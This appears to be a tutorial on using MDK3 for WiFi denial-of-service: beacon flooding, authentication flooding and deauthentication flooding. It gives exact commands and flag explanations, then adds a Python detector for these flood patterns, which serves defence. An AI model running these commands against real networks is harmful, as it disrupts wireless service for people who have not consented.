MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
MDK3, short for Murder Death Kill 3, is one of the most popular wireless hacking tools and is designed specifically for WLAN environments. Its main operation is to flood the network with fake traffic.
This version of MDK3 has a new feature that sends directed probe requests with invalid SSID characters to an AP. The hope is that if enough probes are sent, the AP will lock up and reboot.
As a prerequisite, make sure that your Kali Linux machine has a USB WiFi adapter; to check, type "iwconfig" in your terminal.
Now start your wireless adapter with the help of the Airmon-ng package and put it into monitor mode (the mode used for packet injection) by typing the following command in your terminal:
Command: airmon-ng start wlan0
Fake SSID (Random) Flooding with MDK3
SSID (Service Set Identifier) Flooding, or Beacon Flooding, can be easily done with the help of the mdk3 tool. It means MDK3 can broadcast hundreds or even thousands of fake APs.
SSID Flooding is not a denial of service, but it's still a pretty cool trick to jam the network.
Command: mdk3 wlan0mon b -c 1
Here, the b option tells MDK3 to use Beacon/SSID Flooding Mode
-c 1 tells MDK3 to broadcast all fake APs on channel 1.
You can also define custom SSIDs to broadcast in your network by listing them in a file.
Let's create a text file named yeahhub.list as shown below:
Now run the following command:
Command: mdk3 wlan0mon b -c 1 -f yeahhub.list
Here, b selects Beacon Flood Mode
-c 1 sets the channel to channel 1
-f defines the filename
Moving on to the actual DoS attack, you can perform a DoS attack with MDK3 in two ways:
- Authentication Flooding
- Deauthentication Flooding
In Authentication Flooding, too many authentication requests at one time may cause the wireless access point to freeze up and perhaps stop working entirely.
Command: mdk3 wlan0mon a -a <BSSID>
Here, a defines the Authentication DOS Mode
-a defines the target MAC address, also called the BSSID (Basic Service Set Identifier)
Deauthentication Flooding works much better than authentication mode and doesn't require the resources that the first one does.
To DoS with Deauthentication mode, you need to save all the BSSID addresses in a file and then specify the file with the -b option.
This will send deauth packets to any and all clients connected to the AP specified in the file.
Command: mdk3 wlan0mon d -b blacklist
Here, d defines Deauthentication/Disassociation Amok Mode
-b defines the file name containing MAC Addresses to attack
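On the monitoring side, each of the three flood modes above leaves a distinct pattern in 802.11 management frames. The following Python detector is an added example, not part of MDK3 or the original article: it parses raw frame headers (radiotap header removed) and flags each pattern per one-second window. The thresholds, function names and sample frames are assumptions constructed for illustration.

```python
from collections import defaultdict

BEACON, DISASSOC, AUTH, DEAUTH = 8, 10, 11, 12   # 802.11 management subtypes

def parse_mgmt(frame: bytes):
    """Return (subtype, source MAC, BSSID) of a management frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:   # too short / not type 0
        return None
    return frame[0] >> 4, frame[10:16].hex(":"), frame[16:22].hex(":")

def detect(frames, window=1.0, max_bssids=50, max_auth_srcs=50, max_deauth=30):
    """frames: (timestamp, raw 802.11 frame). Thresholds are assumed; tune per site."""
    beacons = defaultdict(set)    # window -> BSSIDs seen beaconing
    auths = defaultdict(set)      # (window, bssid) -> client MACs authenticating
    deauths = defaultdict(int)    # (window, bssid) -> deauth/disassoc count
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        subtype, src, bssid = parsed
        w = int(ts // window)
        if subtype == BEACON:
            beacons[w].add(bssid)
        elif subtype == AUTH and src != bssid:      # client -> AP direction only
            auths[(w, bssid)].add(src)
        elif subtype in (DEAUTH, DISASSOC):
            deauths[(w, bssid)] += 1
    alerts = [(w, "beacon-flood", None) for w, s in beacons.items() if len(s) > max_bssids]
    alerts += [(w, "auth-flood", b) for (w, b), s in auths.items() if len(s) > max_auth_srcs]
    alerts += [(w, "deauth-flood", b) for (w, b), n in deauths.items() if n > max_deauth]
    return sorted(alerts, key=lambda a: (a[0], a[1]))

def make_frame(subtype, dst, src, bssid):
    """Build a minimal 24-byte management header for the constructed sample."""
    to_b = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([subtype << 4, 0, 0, 0]) + to_b(dst) + to_b(src) + to_b(bssid) + b"\x00\x00"

def sample_capture():
    """Constructed traffic: a normal second 0, then one flood pattern per second."""
    ap, bcast = "02:00:00:00:00:01", "ff:ff:ff:ff:ff:ff"
    rnd = lambda i: "02:aa:00:00:%02x:%02x" % (i >> 8, i & 0xFF)
    f = [(0.1 * i, make_frame(BEACON, bcast, ap, ap)) for i in range(10)]
    f += [(1.0 + i / 100, make_frame(BEACON, bcast, rnd(i), rnd(i))) for i in range(80)]
    f += [(2.0 + i / 100, make_frame(AUTH, ap, rnd(i), ap)) for i in range(80)]
    f += [(3.0 + i / 100, make_frame(DEAUTH, bcast, ap, ap)) for i in range(40)]
    return f

if __name__ == "__main__":
    print(*detect(sample_capture()), sep="\n")
```

Second 0 of the sample holds only one AP beaconing normally and raises no alert; seconds 1 to 3 each trip one rule.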
For a full list of mdk3 options, type "mdk3 --fullhelp".